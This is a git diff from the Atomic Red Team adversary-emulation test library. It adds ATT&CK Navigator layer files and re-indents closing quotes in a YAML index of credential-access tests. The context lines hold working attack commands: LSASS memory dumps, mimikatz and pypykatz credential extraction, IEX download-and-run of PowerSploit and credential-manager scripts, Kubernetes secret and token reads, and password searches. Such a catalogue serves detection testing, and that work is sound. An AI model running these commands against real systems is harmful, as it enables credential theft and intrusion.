+{"version":"4.1","name":"Atomic Red Team (Containers)","description":"Atomic Red Team (Containers) MITRE ATT&CK Navigator Layer","domain":"mitre-enterprise","gradient":{"colors":["#ce232e","#ce232e"],"minValue":0,"maxValue":100},"legendItems":[{"label":"Has at least one test","color":"#ce232e"}],"techniques":[{"techniqueID":"T1053.007","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.007/T1053.007.md"},{"techniqueID":"T1053","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.007/T1053.007.md"},{"techniqueID":"T1552.007","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.007/T1552.007.md"},{"techniqueID":"T1552","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.007/T1552.007.md"},{"techniqueID":"T1609","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1609/T1609.md"},{"techniqueID":"T1611","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1611/T1611.md"}]}
\ No newline at end of file
diff --git a/atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer-google-workspace.json b/atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer-google-workspace.json
new file mode 100644
index 00000000..6a5ee1b8
--- /dev/null
+++ b/atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer-google-workspace.json
@@ -0,0 +1 @@
+{"version":"4.1","name":"Atomic Red Team (Google-Workspace)","description":"Atomic Red Team (Google-Workspace) MITRE ATT&CK Navigator Layer","domain":"mitre-enterprise","gradient":{"colors":["#ce232e","#ce232e"],"minValue":0,"maxValue":100},"legendItems":[{"label":"Has at least one test","color":"#ce232e"}],"techniques":[]}
\ No newline at end of file
diff --git a/atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer-iaas-aws.json b/atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer-iaas-aws.json
new file mode 100644
index 00000000..9959b6ba
--- /dev/null
+++ b/atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer-iaas-aws.json
@@ -0,0 +1 @@
+{"version":"4.1","name":"Atomic Red Team (Iaas:AWS)","description":"Atomic Red Team (Iaas:AWS) MITRE ATT&CK Navigator Layer","domain":"mitre-enterprise","gradient":{"colors":["#ce232e","#ce232e"],"minValue":0,"maxValue":100},"legendItems":[{"label":"Has at least one test","color":"#ce232e"}],"techniques":[]}
\ No newline at end of file
diff --git a/atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer-iaas-azure.json b/atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer-iaas-azure.json
new file mode 100644
index 00000000..046918fc
--- /dev/null
+++ b/atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer-iaas-azure.json
@@ -0,0 +1 @@
+{"version":"4.1","name":"Atomic Red Team (Iaas:Azure)","description":"Atomic Red Team (Iaas:Azure) MITRE ATT&CK Navigator Layer","domain":"mitre-enterprise","gradient":{"colors":["#ce232e","#ce232e"],"minValue":0,"maxValue":100},"legendItems":[{"label":"Has at least one test","color":"#ce232e"}],"techniques":[]}
\ No newline at end of file
diff --git a/atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer-iaas-gcp.json b/atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer-iaas-gcp.json
new file mode 100644
index 00000000..0a1bfbf4
--- /dev/null
+++ b/atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer-iaas-gcp.json
@@ -0,0 +1 @@
+{"version":"4.1","name":"Atomic Red Team (Iaas:GCP)","description":"Atomic Red Team (Iaas:GCP) MITRE ATT&CK Navigator Layer","domain":"mitre-enterprise","gradient":{"colors":["#ce232e","#ce232e"],"minValue":0,"maxValue":100},"legendItems":[{"label":"Has at least one test","color":"#ce232e"}],"techniques":[]}
\ No newline at end of file
diff --git a/atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer-iaas.json b/atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer-iaas.json
new file mode 100644
index 00000000..9964aaea
--- /dev/null
+++ b/atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer-iaas.json
@@ -0,0 +1 @@
+{"version":"4.1","name":"Atomic Red Team (Iaas)","description":"Atomic Red Team (Iaas) MITRE ATT&CK Navigator Layer","domain":"mitre-enterprise","gradient":{"colors":["#ce232e","#ce232e"],"minValue":0,"maxValue":100},"legendItems":[{"label":"Has at least one test","color":"#ce232e"}],"techniques":[{"techniqueID":"T1098.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1098.001/T1098.001.md"},{"techniqueID":"T1098","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1098.001/T1098.001.md"},{"techniqueID":"T1098","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1098/T1098.md"},{"techniqueID":"T1136.003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1136.003/T1136.003.md"},{"techniqueID":"T1136","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1136.003/T1136.003.md"}]}
\ No newline at end of file
diff --git a/atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer-office-365.json b/atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer-office-365.json
new file mode 100644
index 00000000..ca1d359c
--- /dev/null
+++ b/atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer-office-365.json
@@ -0,0 +1 @@
+{"version":"4.1","name":"Atomic Red Team (Office-365)","description":"Atomic Red Team (Office-365) MITRE ATT&CK Navigator Layer","domain":"mitre-enterprise","gradient":{"colors":["#ce232e","#ce232e"],"minValue":0,"maxValue":100},"legendItems":[{"label":"Has at least one test","color":"#ce232e"}],"techniques":[]}
\ No newline at end of file
diff --git a/atomics/Indexes/index.yaml b/atomics/Indexes/index.yaml
index a7d4214d..17a1436d 100644
--- a/atomics/Indexes/index.yaml
+++ b/atomics/Indexes/index.yaml
@@ -61,7 +61,7 @@ credential-access:
           cat #{output_file}
         cleanup_command: 'rm -f #{output_file}
 
-'
+          '
         name: bash
         elevation_required: true
     - name: Access /etc/passwd (Local)
@@ -80,7 +80,7 @@ credential-access:
           cat #{output_file}
         cleanup_command: 'rm -f #{output_file}
 
-'
+          '
         name: sh
   T1557.002:
     technique:
@@ -293,7 +293,7 @@ credential-access:
       description: 'Search through bash history for specifice commands we want to
         capture
 
-'
+        '
       supported_platforms:
       - linux
       - macos
@@ -315,7 +315,7 @@ credential-access:
         command: 'cat #{bash_history_filename} | grep #{bash_history_grep_args} >
           #{output_file}
 
-'
+          '
         name: sh
   T1110:
     technique:
@@ -550,7 +550,7 @@ credential-access:
         pod service account, for example) can access sensitive information that might
         include credentials to various services.
 
-'
+        '
       supported_platforms:
       - containers
       input_arguments:
@@ -561,17 +561,17 @@ credential-access:
       dependencies:
       - description: 'kubectl must be installed
 
-'
+          '
         get_prereq_command: 'echo "kubectl must be installed manually"
 
-'
+          '
         prereq_command: 'which kubectl
 
-'
+          '
       executor:
         command: 'kubectl get secrets -n #{namespace}
 
-'
+          '
         name: bash
         elevation_required: false
     - name: Cat the contents of a Kubernetes service account token file
@@ -579,7 +579,7 @@ credential-access:
       description: 'Access the Kubernetes service account access token stored within
         a container in a cluster.
 
-'
+        '
       supported_platforms:
       - linux
       dependency_executor_name: sh
@@ -587,24 +587,24 @@ credential-access:
       - description: Verify docker is installed.
         prereq_command: 'which docker
 
-'
+          '
         get_prereq_command: 'if [ "" == "`which docker`" ]; then echo "Docker Not
           Found"; if [ -n "`which apt-get`" ]; then sudo apt-get -y install docker
           ; elif [ -n "`which yum`" ]; then sudo yum -y install docker ; fi ; else
           echo "Docker installed"; fi
 
-'
+          '
       - description: Verify docker service is running.
         prereq_command: 'sudo systemctl status docker
 
-'
+          '
         get_prereq_command: 'sudo systemctl start docker
 
-'
+          '
       - description: Verify kind is in the path.
         prereq_command: 'which kind
 
-'
+          '
         get_prereq_command: |
           curl -Lo ./kind https://kind.sigs.k8s.io/dl/v0.10.0/kind-linux-amd64
           chmod +x ./kind
@@ -612,14 +612,14 @@ credential-access:
       - description: Verify kind-atomic-cluster is created
         prereq_command: 'sudo kind get clusters
 
-'
+          '
         get_prereq_command: 'sudo kind create cluster --name atomic-cluster
 
-'
+          '
       - description: Verify kubectl is in path
         prereq_command: 'which kubectl
 
-'
+          '
         get_prereq_command: |
           curl -LO "https://dl.k8s.io/release/$(curl -L -s https://dl.k8s.io/release/stable.txt)/bin/linux/amd64/kubectl"
           chmod +x ./kubectl
@@ -627,19 +627,19 @@ credential-access:
       - description: Verify atomic-pod is running.
         prereq_command: 'kubectl --context kind-atomic-cluster get pods |grep atomic-pod
 
-'
+          '
         get_prereq_command: 'kubectl --context kind-atomic-cluster run atomic-pod
           --image=alpine --command -- sleep infinity
 
-'
+          '
       executor:
         command: 'kubectl --context kind-atomic-cluster exec atomic-pod -- cat /run/secrets/kubernetes.io/serviceaccount/token
 
-'
+          '
         name: sh
         cleanup_command: 'kubectl --context kind-atomic-cluster delete pod atomic-pod
 
-'
+          '
   T1056.004:
     technique:
       external_references:
@@ -741,7 +741,7 @@ credential-access:
       auto_generated_guid: de1934ea-1fbf-425b-8795-65fb27dd7e33
       description: 'Hooks functions in PowerShell to read TLS Communications
 
-'
+        '
       supported_platforms:
       - windows
       input_arguments:
@@ -757,10 +757,10 @@ credential-access:
       dependencies:
       - description: 'T1056.004x64.dll must exist on disk at specified location (#{file_name})
 
-'
+          '
         prereq_command: 'if (Test-Path #{file_name}) {exit 0} else {exit 1}
 
-'
+          '
         get_prereq_command: |
           New-Item -Type Directory (split-path #{file_name}) -ErrorAction ignore | Out-Null
           Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1056.004/bin/T1056.004x64.dll" -OutFile "#{file_name}"
@@ -846,7 +846,7 @@ credential-access:
       description: 'Using username,password combination from a password dump to login
         over SSH.
 
-'
+        '
       supported_platforms:
       - linux
       input_arguments:
@@ -858,16 +858,16 @@ credential-access:
       dependencies:
       - description: 'Requires SSHPASS
 
-'
+          '
         prereq_command: 'if [ -x "$(command -v sshpass)" ]; then exit 0; else exit
           1; fi;
 
-'
+          '
         get_prereq_command: 'if [ $(cat /etc/os-release | grep -i ID=ubuntu) ] ||
           [ $(cat /etc/os-release | grep -i ID=kali) ]; then sudo apt update && sudo
           apt install sshpass -y; else echo "This test requires sshpass" ; fi ;
 
-'
+          '
       executor:
         name: bash
         elevation_required: false
@@ -879,7 +879,7 @@ credential-access:
       description: 'Using username,password combination from a password dump to login
         over SSH.
 
-'
+        '
       supported_platforms:
       - macos
       input_arguments:
@@ -891,11 +891,11 @@ credential-access:
       dependencies:
       - description: 'Requires SSHPASS
 
-'
+          '
         prereq_command: 'if [ -x "$(command -v sshpass)" ]; then exit 0; else exit
           1; fi;
 
-'
+          '
         get_prereq_command: |
           /bin/bash -c "$(curl -fsSL https://raw.githubusercontent.com/Homebrew/install/master/install.sh)"
           brew install hudochenkov/sshpass/sshpass
@@ -991,14 +991,14 @@ credential-access:
       executor:
         command: 'python2 laZagne.py all
 
-'
+          '
         elevation_required: true
         name: bash
     - name: Extract passwords with grep
       auto_generated_guid: bd4cf0d1-7646-474e-8610-78ccf5a097c4
       description: 'Extracting credentials from files
 
-'
+        '
       supported_platforms:
       - macos
       - linux
@@ -1010,14 +1010,14 @@ credential-access:
       executor:
         command: 'grep -ri password #{file_path}
 
-'
+          '
         name: sh
     - name: Extracting passwords with findstr
       auto_generated_guid: 0e56bf29-ff49-4ea5-9af4-3b81283fd513
       description: 'Extracting Credentials from Files. Upon execution, the contents
         of files that contain the word "password" will be displayed.
 
-'
+        '
       supported_platforms:
       - windows
       executor:
@@ -1043,7 +1043,7 @@ credential-access:
       description: 'This test looks for .netrc files (which stores github credentials
         in clear text )and dumps its contents if found.
 
-'
+        '
       supported_platforms:
       - macos
       - linux
@@ -1107,7 +1107,7 @@ credential-access:
       dependencies:
       - description: 'Microsoft Word must be installed
 
-'
+          '
         prereq_command: |
           try {
             New-Object -COMObject "word.Application" | Out-Null
@@ -1118,7 +1118,7 @@ credential-access:
         get_prereq_command: 'Write-Host "You will need to install Microsoft Word manually
           to meet this requirement"
 
-'
+          '
       executor:
         command: |
           [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
@@ -1127,7 +1127,7 @@ credential-access:
         cleanup_command: 'Remove-Item "$env:TEMP\windows-credentials.txt" -ErrorAction
           Ignore
 
-'
+          '
         name: powershell
     - name: Dump credentials from Windows Credential Manager With PowerShell [windows
         Credentials]
@@ -1154,7 +1154,7 @@ credential-access:
         command: 'IEX (IWR ''https://raw.githubusercontent.com/skar4444/Windows-Credential-Manager/4ad208e70c80dd2a9961db40793da291b1981e01/GetCredmanCreds.ps1''
           -UseBasicParsing); Get-CredManCreds -Force
 
-'
+          '
   T1555.003:
     technique:
       created: '2020-02-12T18:57:36.041Z'
@@ -1266,11 +1266,11 @@ credential-access:
       dependencies:
       - description: 'Modified Sysinternals must be located at #{file_path}
 
-'
+          '
         prereq_command: 'if (Test-Path #{file_path}\SysInternals) {exit 0} else {exit
           1}
 
-'
+          '
         get_prereq_command: |
           [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
           Invoke-WebRequest "https://github.com/mitre-attack/attack-arsenal/raw/66650cebd33b9a1e180f7b31261da1789cdceb66/adversary_emulation/APT29/CALDERA_DIY/evals/payloads/Modified-SysInternalsSuite.zip" -OutFile "#{file_path}\Modified-SysInternalsSuite.zip"
@@ -1318,10 +1318,10 @@ credential-access:
       dependencies:
       - description: 'LaZagne.exe must exist on disk at specified location (#{lazagne_path})
 
-'
+          '
         prereq_command: 'if (Test-Path #{lazagne_path}) {exit 0} else {exit 1}
 
-'
+          '
         get_prereq_command: |
           New-Item -Type Directory (split-path #{lazagne_path}) -ErrorAction ignore | Out-Null
           Invoke-WebRequest "https://github.com/AlessandroZ/LaZagne/releases/download/2.4.3/lazagne.exe" -OutFile "#{lazagne_path}"
@@ -1386,7 +1386,7 @@ credential-access:
       description: 'Queries to enumerate for credentials in the Registry. Upon execution,
         any registry key containing the word "password" will be displayed.
 
-'
+        '
       supported_platforms:
       - windows
       executor:
@@ -1404,7 +1404,7 @@ credential-access:
       executor:
         command: 'reg query HKCU\Software\SimonTatham\PuTTY\Sessions /t REG_SZ /s
 
-'
+          '
         name: command_prompt
   T1003.006:
     technique:
@@ -1521,7 +1521,7 @@ credential-access:
       - description: 'Mimikatz executor must exist on disk and at specified location
           (#{mimikatz_path})
 
-'
+          '
         prereq_command: |
           $mimikatz_path = cmd /c echo #{mimikatz_path}
           if (Test-Path $mimikatz_path) {exit 0} else {exit 1}
@@ -1878,7 +1878,7 @@ credential-access:
           to apply changes." & return & return  default answer "" with icon 1 with
           hidden answer with title "Software Update"''
 
-'
+          '
         name: bash
     - name: PowerShell - Prompt User for Password
       auto_generated_guid: 2b162bfd-0928-4d4c-9ec3-4d9f88374b52
@@ -2008,7 +2008,7 @@ credential-access:
       - description: 'Mimikatz executor must exist on disk and at specified location
           (#{mimikatz_path})
 
-'
+          '
         prereq_command: |
           $mimikatz_path = cmd /c echo #{mimikatz_path}
           if (Test-Path $mimikatz_path) {exit 0} else {exit 1}
@@ -2113,26 +2113,26 @@ credential-access:
         files on the Domain Controller. This value can be decrypted with gpp-decrypt
         on Kali Linux.
 
-'
+        '
       supported_platforms:
       - windows
       dependency_executor_name: powershell
       dependencies:
       - description: 'Computer must be domain joined
 
-'
+          '
         prereq_command: 'if((Get-CIMInstance -Class Win32_ComputerSystem).PartOfDomain)
           {exit 0} else {exit 1}
 
-'
+          '
         get_prereq_command: 'Write-Host Joining this computer to a domain must be
           done manually
 
-'
+          '
       executor:
         command: 'findstr /S cpassword %logonserver%\sysvol\*.xml
 
-'
+          '
         name: command_prompt
     - name: GPP Passwords (Get-GPPPassword)
       auto_generated_guid: e9584f82-322c-474a-b831-940fd8b4455c
@@ -2157,25 +2157,25 @@ credential-access:
       dependencies:
       - description: 'Get-GPPPassword PowerShell Script must exist at #{gpp_script_path}
 
-'
+          '
         prereq_command: 'if(Test-Path "#{gpp_script_path}") {exit 0 } else {exit 1
           }
 
-'
+          '
         get_prereq_command: |
           New-Item -ItemType Directory (Split-Path "#{gpp_script_path}") -Force | Out-Null
           Invoke-WebRequest #{gpp_script_url} -OutFile "#{gpp_script_path}"
       - description: 'Computer must be domain joined
 
-'
+          '
         prereq_command: 'if((Get-CIMInstance -Class Win32_ComputerSystem).PartOfDomain)
           {exit 0} else {exit 1}
 
-'
+          '
         get_prereq_command: 'Write-Host Joining this computer to a domain must be
           done manually
 
-'
+          '
       executor:
         command: |
           . #{gpp_script_path}
@@ -2348,15 +2348,15 @@ credential-access:
       dependencies:
       - description: 'Computer must be domain joined
 
-'
+          '
         prereq_command: 'if((Get-CIMInstance -Class Win32_ComputerSystem).PartOfDomain)
           {exit 0} else {exit 1}
 
-'
+          '
         get_prereq_command: 'Write-Host Joining this computer to a domain must be
           done manually
 
-'
+          '
       executor:
         command: |
           [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
@@ -2526,7 +2526,7 @@ credential-access:
           .\T1056.001\src\Get-Keystrokes.ps1 -LogPath #{filepath}
         cleanup_command: 'Remove-Item $env:TEMP\key.log -ErrorAction Ignore
 
-'
+          '
         name: powershell
         elevation_required: true
     - name: Living off the land Terminal Input Capture on Linux with pam.d
@@ -2545,14 +2545,14 @@ credential-access:
       dependencies:
       - description: 'Checking if pam_tty_audit.so is installed
 
-'
+          '
         prereq_command: 'test -f ''/usr/lib/pam/pam_tty_audit.so -o  /usr/lib64/security/pam_tty_audit.so''
 
-'
+          '
         get_prereq_command: 'echo "Sorry, you must install module pam_tty_audit.so
           and recompile, for this test to work"
 
-'
+          '
       supported_platforms:
       - linux
       executor:
@@ -2871,10 +2871,10 @@ credential-access:
       - description: 'Windows Credential Editor must exist on disk at specified location
           (#{wce_exe})
 
-'
+          '
         prereq_command: 'if (Test-Path #{wce_exe}) {exit 0} else {exit 1}
 
-'
+          '
         get_prereq_command: |
           $parentpath = Split-Path "#{wce_exe}"; $zippath = "$parentpath\wce.zip"
           [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
@@ -2914,10 +2914,10 @@ credential-access:
       - description: 'ProcDump tool from Sysinternals must exist on disk at specified
           location (#{procdump_exe})
 
-'
+          '
         prereq_command: 'if (Test-Path #{procdump_exe}) {exit 0} else {exit 1}
 
-'
+          '
         get_prereq_command: |
           [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
           Invoke-WebRequest "https://download.sysinternals.com/files/Procdump.zip" -OutFile "$env:TEMP\Procdump.zip"
@@ -2928,7 +2928,7 @@ credential-access:
         command: "#{procdump_exe} -accepteula -ma lsass.exe #{output_file}\n"
         cleanup_command: 'del "#{output_file}" >nul 2> nul
 
-'
+          '
         name: command_prompt
         elevation_required: true
     - name: Dump LSASS.exe Memory using comsvcs.dll
@@ -2943,10 +2943,10 @@ credential-access:
         command: 'C:\Windows\System32\rundll32.exe C:\windows\System32\comsvcs.dll,
           MiniDump (Get-Process lsass).id $env:TEMP\lsass-comsvcs.dmp full
 
-'
+          '
         cleanup_command: 'Remove-Item $env:TEMP\lsass-comsvcs.dmp -ErrorAction Ignore
 
-'
+          '
         name: powershell
         elevation_required: true
     - name: Dump LSASS.exe Memory using direct system calls and API unhooking
@@ -2969,10 +2969,10 @@ credential-access:
       - description: 'Dumpert executable must exist on disk at specified location
           (#{dumpert_exe})
 
-'
+          '
         prereq_command: 'if (Test-Path #{dumpert_exe}) {exit 0} else {exit 1}
 
-'
+          '
         get_prereq_command: |
           [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
           New-Item -ItemType Directory (Split-Path #{dumpert_exe}) -Force | Out-Null
@@ -2981,7 +2981,7 @@ credential-access:
         command: "#{dumpert_exe}\n"
         cleanup_command: 'del C:\windows\temp\dumpert.dmp >nul 2> nul
 
-'
+          '
         name: command_prompt
         elevation_required: true
     - name: Dump LSASS.exe Memory using Windows Task Manager
@@ -3024,10 +3024,10 @@ credential-access:
       dependencies:
       - description: 'Mimikatz must exist on disk at specified location (#{mimikatz_exe})
 
-'
+          '
         prereq_command: 'if (Test-Path #{mimikatz_exe}) {exit 0} else {exit 1}
 
-'
+          '
         get_prereq_command: |
           [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
           $url = 'https://github.com/gentilkiwi/mimikatz/releases/latest'
@@ -3044,19 +3044,19 @@ credential-access:
           Copy-Item $env:TEMP\Mimi\x64\mimikatz.exe #{mimikatz_exe} -Force
       - description: 'Lsass dump must exist at specified location (#{input_file})
 
-'
+          '
         prereq_command: 'cmd /c "if not exist #{input_file} (exit /b 1)"
 
-'
+          '
         get_prereq_command: 'Write-Host "Create the lsass dump manually using the
           steps in the previous test (Dump LSASS.exe Memory using Windows Task Manager)"
 
-'
+          '
       executor:
         command: '#{mimikatz_exe} "sekurlsa::minidump #{input_file}" "sekurlsa::logonpasswords
           full" exit
 
-'
+          '
         name: command_prompt
         elevation_required: true
     - name: LSASS read with pypykatz
@@ -3073,35 +3073,35 @@ credential-access:
       dependencies:
       - description: 'Computer must have python 3 installed
 
-'
+          '
         prereq_command: |
           py -3 --version >nul 2>&1
           exit /b %errorlevel%
         get_prereq_command: 'echo "Python 3 must be installed manually"
 
-'
+          '
       - description: 'Computer must have pip installed
 
-'
+          '
         prereq_command: |
           py -3 -m pip --version >nul 2>&1
           exit /b %errorlevel%
         get_prereq_command: 'echo "PIP must be installed manually"
 
-'
+          '
       - description: 'pypykatz must be installed and part of PATH
 
-'
+          '
         prereq_command: |
           pypykatz -h >nul 2>&1
           exit /b %errorlevel%
         get_prereq_command: 'pip install pypykatz
 
-'
+          '
       executor:
         command: 'pypykatz live lsa
 
-'
+          '
         name: command_prompt
         elevation_required: true
     - name: Dump LSASS.exe Memory using Out-Minidump.ps1
@@ -3118,7 +3118,7 @@ credential-access:
           IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/mattifestation/PowerSploit/master/Exfiltration/Out-Minidump.ps1'); get-process lsass | Out-Minidump
         cleanup_command: 'Remove-Item $env:TEMP\lsass_*.dmp -ErrorAction Ignore
 
-'
+          '
         name: powershell
         elevation_required: true
     - name: Create Mini Dump of LSASS.exe using ProcDump
@@ -3146,10 +3146,10 @@ credential-access:
       - description: 'ProcDump tool from Sysinternals must exist on disk at specified
           location (#{procdump_exe})
 
-'
+          '
         prereq_command: 'if (Test-Path #{procdump_exe}) {exit 0} else {exit 1}
 
-'
+          '
         get_prereq_command: |
           Invoke-WebRequest "https://download.sysinternals.com/files/Procdump.zip" -OutFile "$env:TEMP\Procdump.zip"
           Expand-Archive $env:TEMP\Procdump.zip $env:TEMP\Procdump -Force
@@ -3159,7 +3159,7 @@ credential-access:
         command: "#{procdump_exe} -accepteula -mm lsass.exe #{output_file}\n"
         cleanup_command: 'del "#{output_file}" >nul 2> nul
 
-'
+          '
         name: command_prompt
         elevation_required: true
     - name: Powershell Mimikatz
@@ -3181,7 +3181,7 @@ credential-access:
         command: 'IEX (New-Object Net.WebClient).DownloadString(''#{remote_script}'');
           Invoke-Mimikatz -DumpCreds
 
-'
+          '
         name: powershell
         elevation_required: true
     - name: Dump LSASS with .Net 5 createdump.exe
@@ -3203,15 +3203,15 @@ credential-access:
       dependencies:
       - description: 'Computer must have createdump.exe from .Net 5
 
-'
+          '
         prereq_command: 'if (Test-Path ''#{createdump_exe}'') {exit 0} else {exit
           1}
 
-'
+          '
         get_prereq_command: 'echo ".NET 5 must be installed manually." "For the very
           brave a copy of the executable can be found here: https://github.com/Scoubi/RedTeam-Tools/blob/main/createdump.exe"
 
-'
+          '
       executor:
         command: |
           echo "Createdump Path #{createdump_exe}"
@@ -3221,7 +3221,7 @@ credential-access:
           & "#{createdump_exe}" -u -f #{output_file} $ID
         cleanup_command: 'del #{output_file}
 
-'
+          '
         name: powershell
         elevation_required: true
     - name: Dump LSASS.exe using imported Microsoft DLLs
@@ -3246,10 +3246,10 @@ credential-access:
       dependencies:
       - description: 'Computer must have xordump.exe
 
-'
+          '
         prereq_command: 'if (Test-Path ''#{xordump_exe}'') {exit 0} else {exit 1}
 
-'
+          '
         get_prereq_command: |
           [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
           Invoke-WebRequest "https://github.com/audibleblink/xordump/releases/download/v0.0.1/xordump.exe" -OutFile #{xordump_exe}
@@ -3257,7 +3257,7 @@ credential-access:
         command: "#{xordump_exe} -out #{output_file} -x 0x41\n"
         cleanup_command: 'Remove-Item ${output_file} -ErrorAction Ignore
 
-'
+          '
         name: powershell
         elevation_required: true
   T1557:
@@ -3463,19 +3463,19 @@ credential-access:
       dependencies:
       - description: 'Target must be a Domain Controller
 
-'
+          '
         prereq_command: 'reg query HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\ProductOptions  /v
           ProductType | findstr LanmanNT
 
-'
+          '
         get_prereq_command: 'echo Sorry, Promoting this machine to a Domain Controller
           must be done manually
 
-'
+          '
       executor:
         command: 'vssadmin.exe create shadow /for=#{drive_letter}
 
-'
+          '
         name: command_prompt
         elevation_required: true
     - name: Copy NTDS.dit from Volume Shadow Copy
@@ -3502,34 +3502,34 @@ credential-access:
       dependencies:
       - description: 'Target must be a Domain Controller
 
-'
+          '
         prereq_command: 'reg query HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\ProductOptions  /v
           ProductType | findstr LanmanNT
 
-'
+          '
         get_prereq_command: 'echo Sorry, Promoting this machine to a Domain Controller
           must be done manually
 
-'
+          '
       - description: 'Volume shadow copy must exist
 
-'
+          '
         prereq_command: 'if not exist #{vsc_name} (exit /b 1)
 
-'
+          '
         get_prereq_command: 'echo Run "Invoke-AtomicTest T1003.003 -TestName ''Create
           Volume Shadow Copy with vassadmin''" to fulfuill this requirement
 
-'
+          '
       - description: 'Extract path must exist
 
-'
+          '
         prereq_command: 'if not exist #{extract_path} (exit /b 1)
 
-'
+          '
         get_prereq_command: 'mkdir #{extract_path}
 
-'
+          '
       executor:
         command: |
           copy #{vsc_name}\Windows\NTDS\NTDS.dit #{extract_path}\ntds.dit
@@ -3561,22 +3561,22 @@ credential-access:
       dependencies:
       - description: 'Target must be a Domain Controller
 
-'
+          '
         prereq_command: 'reg query HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\ProductOptions  /v
           ProductType | findstr LanmanNT
 
-'
+          '
         get_prereq_command: 'echo Sorry, Promoting this machine to a Domain Controller
           must be done manually
 
-'
+          '
       executor:
         command: |
           mkdir #{output_folder}
           ntdsutil "ac i ntds" "ifm" "create full #{output_folder}" q q
         cleanup_command: 'rmdir /q /s #{output_folder} >nul 2>&1
 
-'
+          '
         name: command_prompt
         elevation_required: true
     - name: Create Volume Shadow Copy with WMI
@@ -3595,19 +3595,19 @@ credential-access:
       dependencies:
       - description: 'Target must be a Domain Controller
 
-'
+          '
         prereq_command: 'reg query HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\ProductOptions  /v
           ProductType | findstr LanmanNT
 
-'
+          '
         get_prereq_command: 'echo Sorry, Promoting this machine to a Domain Controller
           must be done manually
 
-'
+          '
       executor:
         command: 'wmic shadowcopy call create Volume=#{drive_letter}
 
-'
+          '
         name: command_prompt
         elevation_required: true
     - name: Create Volume Shadow Copy with Powershell
@@ -3771,15 +3771,15 @@ credential-access:
       dependencies:
       - description: 'Check if at least one of the tools are installed on the machine.
 
-'
+          '
         prereq_command: 'if [ ! -x "$(command -v tcpdump)" ] && [ ! -x "$(command
           -v tshark)" ]; then exit 1; else exit 0; fi;
 
-'
+          '
         get_prereq_command: 'echo "Install tcpdump and/or tshark for the test to run.";
           exit 1;
 
-'
+          '
       executor:
         command: |
           tcpdump -c 5 -nnni #{interface}
@@ -3803,15 +3803,15 @@ credential-access:
       dependencies:
       - description: 'Check if at least one of the tools are installed on the machine.
 
-'
+          '
         prereq_command: 'if [ ! -x "$(command -v tcpdump)" ] && [ ! -x "$(command
           -v tshark)" ]; then exit 1; else exit 0; fi;
 
-'
+          '
         get_prereq_command: 'echo "Install tcpdump and/or tshark for the test to run.";
           exit 1;
 
-'
+          '
       executor:
         command: "sudo tcpdump -c 5 -nnni #{interface}    \nif [ -x \"$(command -v
           tshark)\" ]; then sudo tshark -c 5 -i #{interface}; fi;\n"
@@ -3852,14 +3852,14 @@ credential-access:
       - description: 'tshark must be installed and in the default path of "c:\Program
           Files\Wireshark\Tshark.exe".
 
-'
+          '
         prereq_command: if (test-path "#{tshark_path}") {exit 0} else {exit 1}
         get_prereq_command: |
           Invoke-WebRequest -OutFile $env:temp\wireshark_installer.exe #{wireshark_url}
           Start-Process $env:temp\wireshark_installer.exe /S
       - description: 'npcap must be installed.
 
-'
+          '
         prereq_command: if (test-path "#{npcap_path}") {exit 0} else {exit 1}
         get_prereq_command: |
           Invoke-WebRequest -OutFile $env:temp\npcap_installer.exe #{npcap_url}
@@ -3867,7 +3867,7 @@ credential-access:
       executor:
         command: '"c:\Program Files\Wireshark\tshark.exe" -i #{interface} -c 5
 
-'
+          '
         name: command_prompt
         elevation_required: true
     - name: Windows Internal Packet Capture
@@ -4034,10 +4034,10 @@ credential-access:
       dependencies:
       - description: 'Gsecdump must exist on disk at specified location (#{gsecdump_exe})
 
